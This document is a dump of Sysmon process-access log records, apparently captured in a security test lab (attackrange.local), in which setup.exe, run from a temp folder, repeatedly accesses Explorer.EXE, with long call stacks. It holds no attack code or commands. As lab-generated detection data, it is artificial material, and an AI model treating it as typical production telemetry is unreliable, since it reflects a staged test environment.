13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wo